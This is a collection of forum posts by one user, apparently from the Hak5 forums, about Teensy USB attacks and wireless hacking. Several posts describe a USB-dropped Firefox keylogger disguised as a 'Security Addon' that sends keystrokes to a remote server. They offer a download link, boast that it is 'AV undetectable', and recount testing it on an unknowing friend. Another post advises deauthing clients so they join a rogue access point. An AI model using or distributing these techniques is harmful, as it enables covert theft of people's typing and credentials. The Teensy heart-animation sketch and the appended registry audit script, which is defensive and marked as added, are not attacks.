
sandred


  1. Tried this? http://www.hak5.org/forums/index.php?showtopic=16469
  2. I have put them back. Let me know if you have a problem.
  3. If you have a folder C:\kl (maybe from previous runs), then you have to delete it before running it again. Try that, and try to plug it in with nothing else running on your computer; maybe your computer is slow at multitasking and missing some keystrokes.
  4. All the code does is create a "C:\kl" folder and "print" three files to it. Once it prints the files, it just adds a registry entry into HKCU (which does not need admin rights) to say to Firefox "Hey, there is a plugin that you need to load at C:\kl", and when Firefox starts it loads the code. Once loaded, the plugin watches all the keystrokes made into the browser and quietly posts them to the remote server. The PHP script is placed on the server, which then takes these keys sent and stores them to a file. You do not need to load these files into the Teensy. All you need to do is compile the code in Arduino and flash the Teensy with it. When you plug in the Teensy, it just echos the code to the files and does the rest of that stuff. You can just try it as it is without changing anything. You can always uninstall it after testing. Yes, the keylogger is very simple and very effective and completely undetectable as it is effectively just 2 lines of JavaScript running inside a browser. I already field tested it on one of my friends' computers and he does not think anything ever happened at all when the Teensy installed it. I had to explain the details to him and even after that he does not really believe that's possible. Well, educate the masses I guess.
  5. By using the combination of Cerolobo's code (though I am not Base64 encrypting it) to upload files and Vile's style of calling the command prompt, I made a proof of concept keylogger plugin installation for Firefox. When the Teensy is inserted into USB, it uploads the plugin files into the C:\kl folder (please delete the folder if it already exists) and then proceeds to install the plugin into Firefox by adding a registry key into HKCU\Software\Mozilla\Firefox\Extensions. If Firefox is already running then it is killed and restarted immediately to install the plugin. If not, then the plugin (displayed as "Firefox Security Addon") loads when Firefox starts the next time. If everything goes fine, it will be done in 10 secs. The keystrokes are then sent to the remote server (specified in the code). The remote server then captures the keystrokes, time stamps and IP stamps (Bonus! we get the IP too) the data and logs it. Please keep in mind that this is by no means polished or optimized code; bugs will exist. So watch out. I quickly copy-pasted everything together and tested it. It works beautifully on XP x64 and Win 7 x64. I don't see why this cannot be implemented in a more sophisticated way for other plugin-supported browsers and for all OSs. I would love to see somebody optimize it. Download the code from here: http://karmetasploit.com/KL/AllFiles.zip. If you do not bother to change the server or just want to test it, then the logs are currently stored in this location: http://karmetasploit.com/KL/logger.txt. Some plus points with this kind of keylogger: it works behind whatever firewalls as long as Firefox gets the internet; 100% AV undetectable; you can decide to log or not to log based on IP. Why bother stealing cookies when you can get all the keystrokes. :)
  6. I was trying to get a feel for system delays and general programming flow when using the Teensy. So I thought I would just do this for the heck of it, and when I did it..... why not share it. It will make someone happy for sure. Understand the risks if you are planning to run it. Do not run on slow systems. A few things learnt while doing this: delays are so damn important and they vary from system to system. Almost need to think of the slowest machines. That brings me to my second point: feedback from the system is critical; we need to figure out how to get some feedback from the system.

     /*
      .prints the obfuscated ascii heart
      .gets the heart into recognizable shape
      .says I love you
      .beats the heart <-- this may not work on slower machines
      ***Close all script/text/other programs with text input before running this.
      This program can be highly destructive if notepad is not launched for some reason.
      Use it at your own risk.***
      Build note: this is a Teensyduino sketch; it needs the USB Type set to a
      Keyboard + Mouse profile so that both the Keyboard and Mouse objects exist.
     */
     #include <string.h>

     int ledPin = 11;
     int i, j, k;
     int nBeats = 5;    // no of beats
     int fHigh = 14;    // max font size
     int fLow = 6;      // min font size
     int nSpaces = 20;  // times to move the art to the right
     int cn[] = {0, 0, 0, 0, 0};  // to store the count of each char in the set to be replaced back
     const char *rc[] = {"_", " ", "I", "Love", "You"};  // replaced char set in the original ascii art
     const char *rw[] = {"66", "99", "1", "4", "3"};     // replaced with this char set to obfuscate it
     const char *line[] = {  // ascii art to be printed
       "999999999999999999#991994999999999999999999999999#99199499",
       "999999999999#991994993..99999999999999#991994993...#",
       "99999999#991994993...#99199999999#991994993...#99199",
       "999999#991994993...#991994993...#9966666666666666#99199",
       "9999#991994993...#991994993...#99666666666666666666#99199",
       "99#991994993...#991994993...#99199Lo66666666666666#99199",
       "99#991994993...#991994993...#99199499Y666666666666#",
       "#991994993...#991994993...#991994993..6666#991",
       "#991994993...#991994993...#991994993...#9966#",
       "#991994993...#991994993...#991994993...#99199",
       "#991994993...#991994993...#991994993...#99199",
       "99#991994993...#991994993...#991994993...#99",
       "9999#991994993...#991994993...#991994993...",
       "99999999#991994993...#991994993...#991994993",
       "999999999999#991994993...#991994993...#99199Lov",
       "999999999999999999#991994993...#991994993...#",
       "999999999999999999999999#991994993...#99199499Y",
       "9999999999999999999999999999#991994993...#99199L",
       "9999999999999999999999999999999999#991994993.",
       "99999999999999999999999999999999999999#99199499",
       "999999999999999999999999999999999999999999#99199Lo",
       "99999999999999999999999999999999999999999999#99199",
       "9999999999999999999999999999999999999999999999#99"
     };

     void setup() {
       pinMode(ledPin, OUTPUT);  // set led
       delay(2000);              // not needed
     }

     void loop() {
       delay(2000);                 // wait until hid is detected
       digitalWrite(ledPin, HIGH);  // turn led on
       WriteMessage();              // main function
       KeyCombo(MODIFIERKEY_CTRL, KEY_END);  // just in case the font change function fails, this will not destroy the printed ascii
       KeyPress(KEY_ENTER);
       delay(2000);  // let them watch it for a couple of seconds
       for (j = 1; j <= nBeats; j++) {  // make the heart beat by changing font size
         Beat();  // this will not work on slower machines.
       }
       ChFont(10);                 // set the font size back to the default 10
       digitalWrite(ledPin, LOW);  // turn led off, we are done
       delay(50000);               // delays the loop
     }

     void WriteMessage() {
       runcmd("notepad.exe");  // open notepad from the run dialog
       delay(2000);            // wait until notepad is open
       sysMenu(KEY_X);         // maximize notepad
       delay(1000);            // wait until the command is finished
       ChFont(10);             // set the font size to the default 10
       for (i = 0; i < sizeof(line) / sizeof(line[0]); i++) {  // loop through all lines of art
         for (j = 0; line[i][j] != '\0'; j++) {
           if (line[i][j] == rw[0][0]) { cn[0]++; }  // count each char to be replaced
           if (line[i][j] == rw[1][0]) { cn[1]++; }
           if (line[i][j] == rw[2][0]) { cn[2]++; }
           if (line[i][j] == rw[3][0]) { cn[3]++; }
           if (line[i][j] == rw[4][0]) { cn[4]++; }
           Keyboard.print(line[i][j]);  // print each char letter by letter
           delay(20);                   // this produces something to stare at on screen
         }
         KeyPress(KEY_ENTER);  // new line
       }
       for (i = 0; i < nSpaces; i++) {  // move the whole art to the right, more like to the center of notepad
         KeyCombo(MODIFIERKEY_CTRL, KEY_HOME);
         for (j = 0; j < sizeof(line) / sizeof(line[0]); j++) {  // move one line at a time and loop through all.
           KeyPress(KEY_SPACE);
           //delay(50);
           KeyPress(KEY_DOWN);
           KeyPress(KEY_HOME);
         }
       }
       for (i = 0; i < sizeof(rw) / sizeof(rw[0]); i++) {  // replace char sets one by one
         KeyCombo(MODIFIERKEY_CTRL, KEY_HOME);
         KeyCombo(MODIFIERKEY_CTRL, KEY_H);
         delay(300);
         sysMenu(KEY_M);
         delay(300);             // these are important delays
         ClicknMove(-127, 127);  // moves the replace window to the bottom left and takes it out of the way
         delay(300);             // these are important delays to make the click work
         switch (i) {  // replace accordingly
           case 0:
             Keyboard.print(rw[0]);
             KeyPress(KEY_TAB);
             Keyboard.print(rc[0]);
             for (j = 1; j < cn[0] / 2 - 5; j++) {  // replace char by char but go a few less
               KeyCombo(MODIFIERKEY_ALT, KEY_R);
               delay(100);  // delay to stare at the action
             }
             break;
           case 1:
             Keyboard.print(rw[1]);
             KeyPress(KEY_TAB);
             Keyboard.print(rc[1]);
             for (j = 1; j < (cn[1] / 2 - 5); j++) {
               KeyCombo(MODIFIERKEY_ALT, KEY_R);
               delay(30);
             }
             break;
           case 2:
             Keyboard.print(rw[2]);
             KeyPress(KEY_TAB);
             Keyboard.print(rc[2]);
             for (j = 1; j < cn[2] - 5; j++) {
               KeyCombo(MODIFIERKEY_ALT, KEY_R);
               delay(70);
             }
             break;
           case 3:
             Keyboard.print(rw[3]);
             KeyPress(KEY_TAB);
             Keyboard.print(rc[3]);
             for (j = 1; j < (cn[3] - 5); j++) {
               KeyCombo(MODIFIERKEY_ALT, KEY_R);
               delay(70);
             }
             break;
           case 4:
             Keyboard.print(rw[4]);
             KeyPress(KEY_TAB);
             Keyboard.print(rc[4]);
             for (j = 1; j < (cn[4] - 5); j++) {
               KeyCombo(MODIFIERKEY_ALT, KEY_R);
               delay(70);
             }
             break;
         }
         KeyCombo(MODIFIERKEY_ALT, KEY_A);  // replace the remaining few with replace all
         delay(30);                         // important for the above command to finish.
         sysMenu(KEY_C);                    // close the replace box.
       }
     }

     void Beat() {
       for (i = fLow; i <= fHigh; i++) {  // increase the font one size at a time
         ChFont(i);
         delay(20);
       }
       for (k = fHigh; k >= fLow; --k) {  // decrease the font one size at a time
         ChFont(k);
         delay(20);
       }
     }

     void runcmd(const char *cmd) {
       KeyCombo(MODIFIERKEY_GUI, KEY_R);  // open the run dialog
       delay(1500);                       // wait for it to open
       Keyboard.print(cmd);               // enter some command
       KeyPress(KEY_ENTER);               // exec some command
     }

     void KeyPress(int SomeKey) {
       Keyboard.set_key1(SomeKey);  // set some key
       Keyboard.send_now();         // "press" some key
       // clear some key
       Keyboard.set_key1(0);
       Keyboard.send_now();
     }

     void KeyCombo(int ModKey, int SomeKey) {
       Keyboard.set_modifier(ModKey);  // set one or more modifier keys
       Keyboard.set_key1(SomeKey);     // set regular key
       Keyboard.send_now();            // send strokes
       // clear keys
       Keyboard.set_modifier(0);  // prep release of control keys
       Keyboard.set_key1(0);      // have to do this to keep it from hitting the key multiple times.
       Keyboard.send_now();
     }

     void sysMenu(int SomeKey) {
       Keyboard.set_modifier(MODIFIERKEY_ALT);  // alt+space opens the window system menu
       Keyboard.set_key1(KEY_SPACE);            // set regular key
       Keyboard.send_now();                     // send strokes
       // clear keys
       Keyboard.set_modifier(0);  // prep release of control keys
       Keyboard.set_key1(0);      // have to do this to keep it from hitting the key multiple times.
       Keyboard.send_now();
       delay(10);
       Keyboard.set_key1(SomeKey);  // pick the menu item by its accelerator
       Keyboard.send_now();
       Keyboard.set_key1(0);
       Keyboard.send_now();
     }

     void ClicknMove(int x, int y) {
       Mouse.set_buttons(1, 0, 0);  // hold left button
       Mouse.move(x, y);            // drag
       Mouse.set_buttons(0, 0, 0);  // release
     }

     void ChFont(int sz) {
       KeyCombo(MODIFIERKEY_ALT, KEY_O);  // open the Format menu
       delay(50);                          // magic number that works on my machine
       KeyPress(KEY_F);                    // open the font window
       delay(50);
       KeyPress(KEY_TAB);   // go to font size
       KeyPress(KEY_TAB);   // go to font size
       Keyboard.print(sz);  // give the new size
       KeyPress(KEY_ENTER);
     }
  7. Try DNS tunneling with heyoka. It theoretically should work with existing open ports and give you RDP or SSH, whichever is listening on your master.
  8. Gsm Mitm

     It was a very interesting talk at Shmoocon 2010 about GSM MITM using USRP and OpenBTS. The only downside of it being the cost. I came across this today and you might already be aware of it from AT&T: http://www.wired.com/gadgetlab/2010/03/att-microcell/ . I am not sure if that thing is hackable to begin with, but they claim "Device is secure – cannot be accessed by unauthorized users, easy and secure online management of device settings" .... hmm, sounds challenging and interesting. Any of you looked into it? Maybe we can use this instead of the costly USRP module for GSM MITM?
  9. Do not use wicd or wicd-client. If I remember it correctly, wicd disconnects you from either one of them as soon as you connect to the other. So if you want to test it and still want to use wicd, connect to the internet as you normally do using wicd, then right click on the wicd client icon and completely exit it. Then test if you are still connected to the internet. After that, bring eth0 up using the above commands and you should be fine. I believe if you don't exit wicd before bringing eth0 up it will disconnect you from wlan0. I think, but I am not sure. Try it.
  10. Here .. This might help you. Post back here if you have any problems as I definitely got that working.
  11. I had a copy of it. I hope it is alpha 4. Here is the link.
  12. I am new to this USB thing, so please bear with me. So here are nice tools developed by DB. I downloaded them, made an ISO containing all the tools, including an autorun.inf to launch them all. The thing that I don't understand is that they are all on a "CD-ROM" drive that can't write data (aka dump). So launching them is useless if they can't dump. How do you launch them from a writable portion of the jump drive? The only thing I can think of is to run a script that in turn launches the files. But how do you know in which drive letter the files really are? Could someone please get me started on "launching files"?
  13. Then how can it do both things at the same time? You can only multitask (time share), I assume. If so, will it be fast enough? I will be interested to know how you are approaching this.
  14. Best bet to get the most out of mdk3 and jasager is to run them on separate Fons. Run legend/mdk3/aircrack on one Fon; use it to deauth your target client or AP. That forces your victims to connect to jasager running on the second Fon automatically. It totally works.
  15. Thanks! I was under the impression that it did not require new installs. Now I got it.
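The install mechanism in posts 4 and 5 above relies on a value under HKCU\Software\Mozilla\Firefox\Extensions pointing Firefox at an extension directory on disk. The following PowerShell audit is an added example, not code from the original posts: it enumerates that key (plus the HKLM equivalents) and flags any registered extension whose directory is missing or lies outside the usual install locations; the trusted-root list is an assumption and is only a coarse heuristic.

```powershell
# Added audit script, not from the original posts. Lists Firefox extensions
# registered through the Windows registry and flags entries whose path is
# missing or outside the normal install locations (trusted roots are an assumption).
$ExtensionKeys = @(
    'HKCU:\Software\Mozilla\Firefox\Extensions',
    'HKLM:\Software\Mozilla\Firefox\Extensions',
    'HKLM:\Software\WOW6432Node\Mozilla\Firefox\Extensions'
)

# Roots a legitimately installed extension is expected to live under (assumed list).
$TrustedRoots = @(
    $env:ProgramFiles,
    ${env:ProgramFiles(x86)},
    $env:APPDATA,
    $env:LOCALAPPDATA
) | Where-Object { $_ }

function Get-RegisteredFirefoxExtension {
    foreach ($key in $ExtensionKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $regKey = Get-Item -LiteralPath $key
        # Each value name is the extension ID; its data is the extension path.
        foreach ($id in $regKey.GetValueNames()) {
            $path = [string]$regKey.GetValue($id)
            $exists = ($path -ne '') -and (Test-Path -LiteralPath $path)
            $underTrustedRoot = $false
            foreach ($root in $TrustedRoots) {
                if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                    $underTrustedRoot = $true
                }
            }
            [pscustomobject]@{
                RegistryKey = $key
                ExtensionId = $id
                Path        = $path
                PathExists  = [bool]$exists
                Suspicious  = (-not $underTrustedRoot) -or (-not $exists)
            }
        }
    }
}

# Print everything, suspicious entries first.
Get-RegisteredFirefoxExtension | Sort-Object -Property Suspicious -Descending | Format-Table -AutoSize
```

HKCU is only visible for the account running the script, so run it in each interactive user's context when auditing a shared machine.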